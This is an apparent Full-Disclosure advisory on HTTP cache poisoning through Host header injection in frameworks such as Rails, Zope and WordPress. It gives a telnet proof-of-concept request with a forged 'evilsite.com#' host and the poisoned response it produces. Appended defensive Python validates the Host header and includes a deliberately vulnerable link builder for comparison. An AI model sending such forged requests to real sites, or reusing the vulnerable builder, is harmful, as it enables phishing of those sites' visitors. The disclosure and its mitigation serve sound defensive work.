[Full-disclosure] HTTP cache poisoning via Host header injection



I've confirmed this in default installations of a few web frameworks
including Rails, Zope and WordPress.

The basic vulnerability arises when:

1) Your web server does not validate the Host header
2) Your code or your framework uses the Host header value to build links
3) You employ page or fragment caching

There may be phishing-type exploits possible even if a site does not
do 3), if there are caching proxies at the ISP level.

$ telnet www.example.com 80
Trying 1.2.3.4...
Connected to www.example.com.
Escape character is '^]'.
GET /foo/bar.html HTTP/1.1
User-Agent: Mozilla
Host: evilsite.com#

HTTP/1.1 200 OK
Date: Wed, 10 Jun 2008 00:27:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Wed, 17 Jun 2008 00:27:45 GMT
Content-Length: 2959
Content-Type: text/html; charset=iso-8859-1

<html>
<head>
<title>Foo : Bar</title>
</head>
<body>
<a href="http://evilsite.com#/">Home</a>
<a href="http://evilsite.com#/about">About</a>
<a href="http://evilsite.com#/login">Login</a>

[...snip...]

<hr>
<address>Apache Server at evilsite.com# Port 80</address>
</body></html>
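
As an added illustration (not code from the original post or the linked write-up), the check below removes condition 1) and, for link building, condition 2): the Host header is parsed strictly, compared against an allow-list, and absolute links are built from a configured canonical hostname instead of the request. The allow-list and canonical host are assumed values; the verbatim-trust builder is included only to reproduce the poisoned links seen in the transcript.

```python
import re

# Assumed deployment configuration: the hostnames this server actually answers for.
ALLOWED_HOSTS = {"www.example.com", "example.com"}
CANONICAL_HOST = "www.example.com"

# Strict host[:port] syntax: letters, digits, '.' and '-' only. Anything else
# (the '#' from the transcript, '/', '?', whitespace) fails to match.
_HOST_RE = re.compile(
    r"^(?P<host>[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?)(?::(?P<port>\d{1,5}))?$"
)


def parse_host_header(value):
    """Return (host, port) for a syntactically valid Host header, else None."""
    m = _HOST_RE.match(value.strip())
    if not m:
        return None
    port = int(m.group("port")) if m.group("port") else 80
    if not 0 < port < 65536:
        return None
    return m.group("host").lower(), port


def host_is_allowed(value, allowed=ALLOWED_HOSTS):
    """True only if the header parses and names a host we serve."""
    parsed = parse_host_header(value)
    return parsed is not None and parsed[0] in allowed


def build_link_vulnerable(host_header, path):
    # Mirrors the behaviour in the transcript: the Host value is trusted verbatim,
    # so whatever the client sent ends up in links that the cache then stores.
    return f"http://{host_header}{path}"


def build_link_hardened(host_header, path, canonical=CANONICAL_HOST):
    # Unknown hosts are rejected (the caller should answer 400 and not cache);
    # known hosts still get links built from the configured canonical name.
    if not host_is_allowed(host_header):
        return None
    return f"http://{canonical}{path}"
```

Rejecting before the response is generated matters because a poisoned page that reaches the cache under Cache-Control: max-age=60 is served to every later visitor for that minute.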


Some more details here:
http://carlos.bueno.org/2008/06/host-header-injection.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


